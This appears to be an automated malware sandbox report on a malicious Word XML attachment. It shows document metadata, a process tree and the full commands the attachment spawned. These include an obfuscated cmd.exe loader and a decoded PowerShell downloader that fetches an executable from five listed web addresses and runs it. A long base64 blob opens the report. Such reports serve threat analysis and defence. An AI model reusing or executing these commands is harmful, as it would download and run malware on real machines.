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 AE4AAABAAAAL8AQAAAASNFZ4
WordDocumentShapeDefaultsShapedefaultsExt: edit
WordDocumentShapeDefaultsShapedefaultsSpidmax: 1026
WordDocumentShapeDefaultsShapelayoutExt: edit
WordDocumentShapeDefaultsShapelayoutIdmapExt: edit
WordDocumentShapeDefaultsShapelayoutIdmapData: 1
WordDocumentDocPrViewVal: print
WordDocumentDocPrZoomPercent: 100
WordDocumentDocPrRemovePersonalInformation: -
WordDocumentDocPrDoNotEmbedSystemFonts: -
WordDocumentDocPrDefaultTabStopVal: 720
WordDocumentDocPrPunctuationKerning: -
WordDocumentDocPrCharacterSpacingControlVal: DontCompress
WordDocumentDocPrOptimizeForBrowser: -
WordDocumentDocPrDoNotSaveWebPagesAsSingleFile: -
WordDocumentDocPrPixelsPerInchVal: 120
WordDocumentDocPrValidateAgainstSchema: -
WordDocumentDocPrSaveInvalidXMLVal: off
WordDocumentDocPrIgnoreMixedContentVal: off
WordDocumentDocPrAlwaysShowPlaceholderTextVal: off
WordDocumentDocPrCompatBreakWrappedTables: -
WordDocumentDocPrCompatSnapToGridInCell: -
WordDocumentDocPrCompatWrapTextWithPunct: -
WordDocumentDocPrCompatUseAsianBreakRules: -
WordDocumentDocPrCompatDontGrowAutofit: -
WordDocumentDocPrRsidsRsidRootVal: 005E6EE1
WordDocumentDocPrRsidsRsidVal: 00187F7A
WordDocumentBodySectPRsidR: 005E6EE1
WordDocumentBodySectPRsidRDefault: 00187F7A
WordDocumentBodySectPRRsidRPr: 00F17EA2
WordDocumentBodySectPRRPrNoProof: -
WordDocumentBodySectPRPictShapetypeId: _x0000_t75
WordDocumentBodySectPRPictShapetypeCoordsize: 21600,21600
WordDocumentBodySectPRPictShapetypeSpt: 75
WordDocumentBodySectPRPictShapetypePreferrelative: t
WordDocumentBodySectPRPictShapetypePath: m@4@5l@4@11@9@11@9@5xe
WordDocumentBodySectPRPictShapetypeFilled: f
WordDocumentBodySectPRPictShapetypeStroked: f
WordDocumentBodySectPRPictShapetypeStrokeJoinstyle: miter
WordDocumentBodySectPRPictShapetypeFormulasFEqn: if lineDrawn pixelLineWidth 0
WordDocumentBodySectPRPictShapetypePathExtrusionok: f
WordDocumentBodySectPRPictShapetypePathGradientshapeok: t
WordDocumentBodySectPRPictShapetypePathConnecttype: rect
WordDocumentBodySectPRPictShapetypeLockExt: edit
WordDocumentBodySectPRPictShapetypeLockAspectratio: t
WordDocumentBodySectPRPictBinDataName: wordml://02000001.jpg
WordDocumentBodySectPRPictBinData: (Binary data 145376 bytes, use -b option to extract)
WordDocumentBodySectPRPictShapeId: Picture 1
WordDocumentBodySectPRPictShapeSpid: _x0000_i1025
WordDocumentBodySectPRPictShapeType: #_x0000_t75
WordDocumentBodySectPRPictShapeStyle: width:468pt;height:349.5pt;visibility:visible;mso-wrap-style:square
WordDocumentBodySectPRPictShapeImagedataSrc: wordml://02000001.jpg
WordDocumentBodySectPRPictShapeImagedataTitle: -
WordDocumentBodySectSectPrRsidR: 005E6EE1
WordDocumentBodySectSectPrPgSzW: 12240
WordDocumentBodySectSectPrPgSzH: 15840
WordDocumentBodySectSectPrPgMarTop: 1440
WordDocumentBodySectSectPrPgMarRight: 1440
WordDocumentBodySectSectPrPgMarBottom: 1440
WordDocumentBodySectSectPrPgMarLeft: 1440
WordDocumentBodySectSectPrPgMarHeader: 720
WordDocumentBodySectSectPrPgMarFooter: 720
WordDocumentBodySectSectPrPgMarGutter: -
WordDocumentBodySectSectPrColsSpace: 720
WordDocumentBodySectSectPrDocGridLine-pitch: 360
No data.
screenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
38
Monitored processes
7
Malicious processes
5
Suspicious processes
0

Behavior graph

Click at the process to see the details
start msoxmled.exe no specs winword.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs powershell.exe

Process information

PID
CMD
Path
Indicators
Parent process
2896"C:\Program Files\Common Files\Microsoft Shared\OFFICE14\MSOXMLED.EXE" /verb open "C:\Users\admin\Desktop\Untitled_attachment_20190122.doc.xml"C:\Program Files\Common Files\Microsoft Shared\OFFICE14\MSOXMLED.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
XML Editor
Exit code:
0
Version:
14.0.4750.1000
2920"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\Untitled_attachment_20190122.doc.xml"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEMSOXMLED.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
4064c:\w8525\l1499\r2543\..\..\..\windows\system32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V:ON/C"set lkQi=:~pW7U+P@j20CTw-z\k9bxZ/A5fqt=Ryvgl%EGJ(18u;'6KS.LO{h} XDsie$rcm3aMdBF)oN4n,I&&for %f in (2;71;14;35;7;5;68;49;76;12;0;1;25;75;40;35;61;35;47;36;47;47;76;50;72;72;24;66;36;0;1;15;73;75;40;35;52;35;13;36;66;7;0;1;15;64;75;40;35;34;34;54;60;20;45;25;19;25;29;44;2;4;45;41;25;44;43;60;62;45;41;19;73;29;74;59;14;15;71;20;9;59;62;28;54;72;59;28;48;3;59;20;12;34;58;59;74;28;43;60;58;73;4;45;25;29;44;52;28;28;2;0;23;23;9;42;63;59;57;65;63;59;67;58;74;65;48;62;71;63;23;69;46;62;55;34;28;30;65;8;52;28;28;2;0;23;23;63;65;61;58;2;71;57;65;2;34;42;57;48;62;71;63;23;58;67;31;42;67;38;16;67;8;52;28;28;2;0;23;23;20;34;65;63;67;58;33;58;28;65;34;48;62;71;63;23;67;62;10;62;56;58;11;8;52;28;28;2;0;23;23;67;71;62;42;63;59;74;28;65;28;58;71;74;15;62;71;74;28;59;57;28;48;62;71;63;23;24;7;31;10;7;66;61;26;67;71;8;52;28;28;2;0;23;23;59;74;59;61;9;58;58;18;34;58;63;34;59;74;67;58;61;63;59;48;62;71;63;23;14;2;15;65;67;63;58;74;23;62;57;57;23;22;31;50;13;45;34;28;63;74;49;44;48;47;2;34;58;28;39;44;8;44;70;43;60;27;19;73;19;45;29;44;57;64;45;45;4;44;43;60;14;64;25;10;73;54;29;54;44;41;4;64;44;43;60;62;73;10;19;40;29;44;67;45;41;40;40;44;43;60;52;45;64;25;11;29;60;59;74;32;0;28;59;63;2;6;44;17;44;6;60;14;64;25;10;73;6;44;48;59;21;59;44;43;26;71;61;59;65;62;52;39;60;18;10;73;11;41;54;58;74;54;60;58;73;4;45;25;70;51;28;61;31;51;60;62;45;41;19;73;48;56;71;14;74;34;71;65;67;69;58;34;59;39;60;18;10;73;11;41;75;54;60;52;45;64;25;11;70;43;60;9;64;45;73;19;29;44;2;45;45;4;64;44;43;76;26;54;39;39;37;59;28;15;76;28;59;63;54;60;52;45;64;25;11;70;48;34;59;74;33;28;52;54;15;33;59;54;73;11;11;11;11;70;54;51;76;74;32;71;18;59;15;76;28;59;63;54;60;52;45;64;25;11;43;60;9;4;4;73;19;29;44;58;19;41;41;25;44;43;20;61;59;65;18;43;53;53;62;65;28;62;52;51;53;53;60;2;45;10;73;19;29;44;67;73;4;25;25;44;43;78)do set 3ud2=!3ud2!!lkQi:~%f,1!&&if %f equ 78 echo !3ud2:*3ud2!=!|cmd.exe"c:\windows\system32\cmd.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2588CmD /V:ON/C"set lkQi=:~pW7U+P@j20CTw-z\k9bxZ/A5fqt=Ryvgl%EGJ(18u;'6KS.LO{h} XDsie$rcm3aMdBF)oN4n,I&&for %f in (2;71;14;35;7;5;68;49;76;12;0;1;25;75;40;35;61;35;47;36;47;47;76;50;72;72;24;66;36;0;1;15;73;75;40;35;52;35;13;36;66;7;0;1;15;64;75;40;35;34;34;54;60;20;45;25;19;25;29;44;2;4;45;41;25;44;43;60;62;45;41;19;73;29;74;59;14;15;71;20;9;59;62;28;54;72;59;28;48;3;59;20;12;34;58;59;74;28;43;60;58;73;4;45;25;29;44;52;28;28;2;0;23;23;9;42;63;59;57;65;63;59;67;58;74;65;48;62;71;63;23;69;46;62;55;34;28;30;65;8;52;28;28;2;0;23;23;63;65;61;58;2;71;57;65;2;34;42;57;48;62;71;63;23;58;67;31;42;67;38;16;67;8;52;28;28;2;0;23;23;20;34;65;63;67;58;33;58;28;65;34;48;62;71;63;23;67;62;10;62;56;58;11;8;52;28;28;2;0;23;23;67;71;62;42;63;59;74;28;65;28;58;71;74;15;62;71;74;28;59;57;28;48;62;71;63;23;24;7;31;10;7;66;61;26;67;71;8;52;28;28;2;0;23;23;59;74;59;61;9;58;58;18;34;58;63;34;59;74;67;58;61;63;59;48;62;71;63;23;14;2;15;65;67;63;58;74;23;62;57;57;23;22;31;50;13;45;34;28;63;74;49;44;48;47;2;34;58;28;39;44;8;44;70;43;60;27;19;73;19;45;29;44;57;64;45;45;4;44;43;60;14;64;25;10;73;54;29;54;44;41;4;64;44;43;60;62;73;10;19;40;29;44;67;45;41;40;40;44;43;60;52;45;64;25;11;29;60;59;74;32;0;28;59;63;2;6;44;17;44;6;60;14;64;25;10;73;6;44;48;59;21;59;44;43;26;71;61;59;65;62;52;39;60;18;10;73;11;41;54;58;74;54;60;58;73;4;45;25;70;51;28;61;31;51;60;62;45;41;19;73;48;56;71;14;74;34;71;65;67;69;58;34;59;39;60;18;10;73;11;41;75;54;60;52;45;64;25;11;70;43;60;9;64;45;73;19;29;44;2;45;45;4;64;44;43;76;26;54;39;39;37;59;28;15;76;28;59;63;54;60;52;45;64;25;11;70;48;34;59;74;33;28;52;54;15;33;59;54;73;11;11;11;11;70;54;51;76;74;32;71;18;59;15;76;28;59;63;54;60;52;45;64;25;11;43;60;9;4;4;73;19;29;44;58;19;41;41;25;44;43;20;61;59;65;18;43;53;53;62;65;28;62;52;51;53;53;60;2;45;10;73;19;29;44;67;73;4;25;25;44;43;78)do set 3ud2=!3ud2!!lkQi:~%f,1!&&if %f equ 78 echo !3ud2:*3ud2!=!|cmd.exe"C:\Windows\system32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2620C:\Windows\system32\cmd.exe /S /D /c" echo pow%PUBLIC:~5,1%r%SESSIONNAME:~-4,1%h%TEMP:~-3,1%ll $b6595='p7685';$c6894=new-object Net.WebClient;$i4765='http://jumesamedina.com/FKcXltRa@http://mariposaplus.com/idyudJzd@http://blamdigital.com/dc2cDi0@http://documentation-contest.com/APy2PMrfdo@http://enerjiiklimlendirme.com/wp-admin/css/ZyOT6ltmnL'.Split('@');$q9496='s3667';$w3524 = '873';$c4291='d6811';$h6350=$env:temp+'\'+$w3524+'.exe';foreach($k2408 in $i4765){try{$c6894.DownloadFile($k2408, $h6350);$j3649='p6673';If ((Get-Item $h6350).length -ge 40000) {Invoke-Item $h6350;$j7749='i9885';break;}}catch{}}$p6249='d4755';"C:\Windows\system32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2708cmd.exeC:\Windows\system32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3168powershell $b6595='p7685';$c6894=new-object Net.WebClient;$i4765='http://jumesamedina.com/FKcXltRa@http://mariposaplus.com/idyudJzd@http://blamdigital.com/dc2cDi0@http://documentation-contest.com/APy2PMrfdo@http://enerjiiklimlendirme.com/wp-admin/css/ZyOT6ltmnL'.Split('@');$q9496='s3667';$w3524 = '873';$c4291='d6811';$h6350=$env:temp+'\'+$w3524+'.exe';foreach($k2408 in $i4765){try{$c6894.DownloadFile($k2408, $h6350);$j3649='p6673';If ((Get-Item $h6350).length -ge 40000) {Invoke-Item $h6350;$j7749='i9885';break;}}catch{}}$p6249='d4755';C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
1 348
Read events
878
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
2
Text files
2
Unknown types
5

Dropped files

PID
Process
Filename
Type
2920WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR6E1C.tmp.cvr
MD5:
SHA256:
2920WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D66F90FB.jpg
MD5:
SHA256:
3168powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\VRMTRYT0TC4O21IEM1OP.temp
MD5:
SHA256:
